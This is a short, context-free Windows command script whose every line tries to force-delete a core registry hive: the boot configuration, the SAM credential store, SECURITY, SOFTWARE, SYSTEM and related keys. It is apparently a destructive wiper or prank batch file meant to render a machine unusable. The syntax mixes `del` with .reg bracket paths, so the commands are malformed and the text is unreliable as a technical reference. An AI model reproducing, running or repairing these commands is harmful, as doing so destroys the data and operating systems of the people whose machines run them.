del "[HKEY_LOCAL_MACHINE\BCD00000000]" /f
del "[HKEY_LOCAL_MACHINE\HARDWARE]" /f
del "[HKEY_LOCAL_MACHINE\SAM]" /f
del "[HKEY_LOCAL_MACHINE\SECURITY]" /f
del "[HKEY_LOCAL_MACHINE\SOFTWARE]" /f
del "[HKEY_LOCAL_MACHINE\SYSTEM]" /f
del "[HKEY_CURRENT_CONFIG\SOFTWARE]" /f
del "[HKEY_CURRENT_CONFIG\SYSTEM]" /f
